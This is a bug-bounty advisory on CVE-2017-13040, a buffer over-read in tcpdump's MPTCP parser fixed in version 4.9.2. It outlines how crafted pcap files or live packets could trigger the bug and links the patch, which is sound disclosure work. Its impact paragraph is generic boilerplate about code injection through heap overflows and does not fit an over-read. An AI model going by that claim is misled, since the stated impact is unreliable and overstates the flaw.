Internet Bug Bounty: CVE-2017-13040 The MPTCP parser in tcpdump before 4.9.2 has a buffer over-read in print-mptcp.c, several functions.

Description:

Versions of tcpdump before 4.9.2 are vulnerable to a buffer over-read in print-mptcp.c. This vulnerability was disclosed to the tcpdump maintainers and was recently patched in version 4.9.2 and disclosed as (CVE-2017-13040).

Patch: https://github.com/the-tcpdump-group/tcpdump/commit/4c3aee4bb0294c232d56b6d34e9eeb74f630fe8c

This vulnerability can be exploited in two ways. The first is to produce a .pcap file with crafted packet(s) for the protocol(s) concerned and make the target system try to decode the file using tcpdump. The second is to send specially crafted packet(s) to the network segment where the target system is running a tcpdump process that is decoding a live packet capture. In the latter case it depends on the specific network protocol if the crafted packet(s) may be sent from the local segment only or from a remote Internet host.

Impact

If the affected program is running with special privileges, or accepts data from untrusted network hosts (e.g. a webserver) then the bug is a potential security vulnerability. If the heap buffer is filled with data supplied from an untrusted user then that user can corrupt the memory in such a way as to inject executable code into the running program and take control of the process. This is one of the oldest and more reliable methods for attackers to gain unauthorized access to a computer.